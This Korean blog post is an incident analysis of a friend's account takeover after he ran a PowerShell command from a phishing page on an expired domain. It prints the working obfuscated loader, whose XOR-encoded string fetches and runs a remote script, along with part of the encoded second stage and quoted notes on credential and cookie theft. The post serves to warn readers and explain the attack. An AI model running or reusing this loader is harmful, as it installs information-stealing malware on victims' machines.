26.05.12 지인으로부터 자신의 인스타와 디스코드가 해킹 당했다는 얘기를 들었다.
똑똑한 개발자 친구인데 왜 해킹을 당했을까 하니.. 개발하다 심신이 지쳐 게임 분석 데이터를 무료로 다운받을 수 있다는 말에 혹해 자신의 Powershell에 코드를 입력한게 화근이였을거라고 추측했다.
아마 디스코드나 인스타에 이런거를 올리지 않았으면 친구도 해킹당한거 눈치채지 못했을텐데 한편으로 해커가 바보같다는 생각도 든다. 우선 급하게 랜선 뽑고 컴퓨터를 끄라고 하라고 일렀다. 그리고, 마음을 가다듬고 히스토리를 정리해서 달라고 했다.
| 친구 히스토리 |
| 05/11 17:34 검은사막 인벤 댓글에 위험 사이트 URL 확인 05/11 17:35 위험 사이트 접속 05/11 17:36~40 사이트 지시대로 파워 쉘 명령어 입력 (불확실) 05/11 17:37 윈도우 보안 발동 05/11 17:41 윈도우 보안 발동 ... 05/12 11:33 컴퓨터 킴 05/12 11:33 윈도우 보안 발동 5/12 20:55 캐나다 접속 5/12 21:00~10 인스타 업로드 (해킹) (스토리에 아래 두 사진 업로드) |
의심 포인트
1. 검은사막 인벤에 저런 피싱사이트 URL이 있을수 있을까?
2. 파워 쉘 명령어가 뭐였을까
일단 그 문제의 글에 들어가서 확인해보았다.
https://www.inven.co.kr/board/black/3585/164401
Whois 들어가서 확인해보니 저 글을 쓸 당시의 도메인 주소의 주인이 지금과 다르다. 만료가 된 도메인을 이용해 악성코드를 유포하는 나쁜 인간.. 나름 꽤 큰 사이트였는지 이런식으로 일반인들이 유포한 정상적이였던 URL이 지금은 악성 URL로 둔갑한 셈
악성 코드가 무엇인지를 확인하기 위해 안전하게 격리시키고 사이트에 들어가 악성코드를 확인하니 아래와 같았다.
| Powershell에 입력 유도했던 내용. 절대 입력 금지 |
| $TokenKey130=270759; $InternalRef920='FSMl34OLrEp1MtjppS6ptpICO'; $AgentSync988='h6w4xSFe0iuLxCcF2qUkXCTPHyeUKDHpz2Kz5'; $RetryLimit888='BoMS8pDJ0Eo2cMcDREWe3'; $FcnTDK=194,217,198,139,195,223,223,219,216,145,132,132,217,206,202,207,210,216,206,200,200,195,206,200,192,133,216,219,202,200,206,132,197,223,217,196,194,133,194,197,194,139,215,139,194,206,211; $Hfqawj=171; $gCBuSr=($FcnTDK|%{[char]($_-bxor$Hfqawj)})-join''; &('i'+'e'+'x') $gCBuSr; $InternalRef207=207513; $NodeID733='dL7hOB3YFh0qbHebujhyGl0H7'; $AgentSync911='XfIEULCm1nY9brYDGwYBDe6Qr90iiAt21b'; $TokenKey285='uSpMOcVNtl6d1ntaMgaDj' |
PowerShell 난독화 악성코드. 악성코드 배포, 원격 명령 실행, 시스템 침해 등에 사용되는 전형적인 기법
어떤 코드 자체가 악성코드 탐지를 피하기 위해 인코딩되어 있고, 이를 XOR하여 해제하면 나오는 중간에 보이는 복호화된 문자열을 iex (Invoke-Expression)로 즉시 실행하는 부분이 눈에 보인다.
이걸 풀면 아래와 같은 식의 스크립트가 나온다.
| irm https://악성사이트.com/script.ps1 | iex |
1. irm: 악성사이트에 접속해서 스크립트를 다운받은후
2. iex: 스크립트를 바로 실행한다
마찬가지로 격리된 환경에서 스크립트를 다운받아봤다.
| 9MB 악성 코드: xxx.ini |
| $ErrorActionPreference = 'SilentlyContinue' $rlyk08dwh6QSG = 'dbc30e2d12ad2dd25f1d9af5f38513ee4c72a9d335dc83f91aa87ef8a188eff6e326b44a38a00d4a6c91b87ebf1843f645c403489f78499ca03421868b7947891eca54eec0a79cfda3d054d4d1998cc594e7b354a220bece6cda96e6155f9302fb576336955ae8aadf0a7d61cb65e5b31d2d258c2eecb462a13b6145dc3fcd1dc2866462ff9136cedf812df49348a7fb9d6631d9c1dfcb82f76da125d4bf2ab4f5ee847776004aa2e30bf474c975eba |
Claude를 이용해서 분석해보려 했으나 보안상의 이유로 알려주지않는다고 한다.
VirusTotal에서 파일 Hash 분석을 해보니..
[이하 Claude 답변]
Trojan:Script/Wacatac.B!ml 분석
🔍 개요
Trojan:Script/Wacatac.B!ml은 단일 바이러스가 아니라 광범위한 휴리스틱(행동 기반) 탐지 레이블입니다. 고급 스크립팅과 회피 기술을 사용하는 모듈형 악성코드 패밀리의 다양한 악의적 활동을 포착합니다. Microsoft
⚙️ 작동 방식
이 트로이안은 다단계 임플란트 구조로 동작합니다. 첫 번째 단계는 작은 드로퍼(dropper) 또는 로더(loader)로, 기기에 발판을 마련하고 샌드박스나 가상 머신에서 실행 중인지 확인한 뒤, 이상이 없으면 C2(명령 및 제어) 서버에 접속해 실제 페이로드를 다운로드합니다. Microsoft
주요 악성 행위:
- 정보 탈취 — 키로거나 폼 그래빙을 통해 로그인 자격 증명이나 은행 계좌 정보 등 개인 데이터를 수집합니다. Cybernews
- 추가 악성코드 설치 — 다른 악성코드를 다운로드하고 설치할 수 있습니다. Cybernews
- 백도어 및 봇넷 — 백도어를 생성해 기기를 봇넷에 추가하며, 이는 DDoS 공격, 크립토 마이닝 등에 악용될 수 있습니다. Cybernews
- 시스템 지속성 확보 — 레지스트리 키를 수정하고, Windows 파일을 변조하며, 그룹 정책 설정까지 바꿔 보안 도구를 비활성화하고 재부팅 후에도 살아남습니다. Microsoft
📥 주요 감염 경로
소셜 엔지니어링을 통해 주로 퍼지며, 불법 복제 소프트웨어(크랙) 또는 피싱 캠페인을 통해 유입됩니다. Microsoft
Wacatac의 비밀번호 수집 방식
브라우저 저장 비밀번호 직접 탈취
가장 흔하고 위험한 방법이에요.
크롬, 엣지, 파이어폭스 등 브라우저는 비밀번호를 PC 내부 파일에 저장하는데, Wacatac은 그 파일 위치를 알고 있어서 저장된 비밀번호를 통째로 복사해 가요. "비밀번호 저장하시겠어요?" 눌러서 저장한 것들이 전부 위험해요.
키로거
감염 이후 키보드 입력을 실시간 기록해요. 브라우저에 저장 안 하고 직접 타이핑한 비밀번호도 다 잡혀요. 로그인할 때마다 해커한테 전송되는 구조예요.
폼 그래빙
로그인 버튼을 누르는 순간, 전송되기 직전의 데이터를 가로채요. HTTPS 암호화도 소용없어요. 이미 내 PC 안에서 가로채는 거라서요.
피해 정황 및 대응
1) 해킹 정황 파악
- Chrome 저장된 password가 유출됐을 가능성 vs 브라우저 캐시만 유출됐을 가능성 고민함
- 확인해보니 다른 싸이트는 접속한 기록은 없었다. Discord와 Instagram만 당한 것을 보아 혹시 Cookie hijacking이 아닌가하여 Claude한테 물어보니
[이하 Claude 답변]
서비스별 위험도 정리
| 인스타그램 | 🔴 높음 | 세션 유효기간 길고 IP 검증 느슨 |
| 페이스북 | 🔴 높음 | 인스타와 동일 Meta 계정 연동, 세션 공유됨 |
| 유튜브/구글 | 🟠 중간 | 세션 길지만 기기 지문 검증 있음 |
| 디스코드 | 🔴 높음 | 토큰 기반 인증이라 탈취 시 영구 접근 가능 |
| 트위터/X | 🟠 중간 | 세션 길고 이상 탐지 보통 수준 |
| 네이버 | 🟡 낮음 | IP 변경 감지, 이상 로그인 알림 강함 |
| 카카오 | 🟡 낮음 | 기기 등록 기반, 재인증 요구 빈번 |
| 쿠팡/네이버쇼핑 | 🟠 중간 | 세션 탈취 시 결제 시도 가능성 |
| Microsoft 365 | 🔴 높음 | ESTSAUTH 쿠키 탈취 시 MFA 우회하고 메일, 파일 전체 접근 가능 Varonis |
| Gmail | 🟠 중간 | 기기 지문 있지만 탈취 사례 다수 존재 |
특히 지금 상황에서 위험한 것들
페이스북 — 즉시 확인 필요 인스타그램과 Meta 계정이 연동돼 있으면 인스타 쿠키로 페북까지 접근 가능해요. 같이 털렸을 가능성 높아요.
디스코드 — 매우 위험 디스코드는 토큰 방식이라 쿠키 탈취 시 비밀번호 바꿔도 토큰이 살아있으면 계속 접근 가능해요. 그리고 앞서 스크린샷에서 GOMCam 폴더 경로가 디스코드 관련 악성코드와 겹치는 사례가 있었어요.
쿠팡, 네이버쇼핑 — 금전 피해 가능 세션 탈취 후 저장된 카드로 결제 시도할 수 있어요.
인스타와 디스코드가 쿠키 하이재킹이 잘통하는 두 개였던 것
해당 사이트들은 다 비밀번호를 바꾼 뒤 접속 기기 전체 로그아웃
2) 혹시 남아있을 악성코드가 있을지 몰라
데이터를 다른 드라이브에 옮기고 악성코드 검사를 돌린 후 C 드라이브 전체 포맷을 진행
오늘의 포인트
문제 없어 보이는 도메인도 믿지 말자
'Security' 카테고리의 다른 글
| Threat modeling (위협 모델링) (0) | 2026.06.03 |
|---|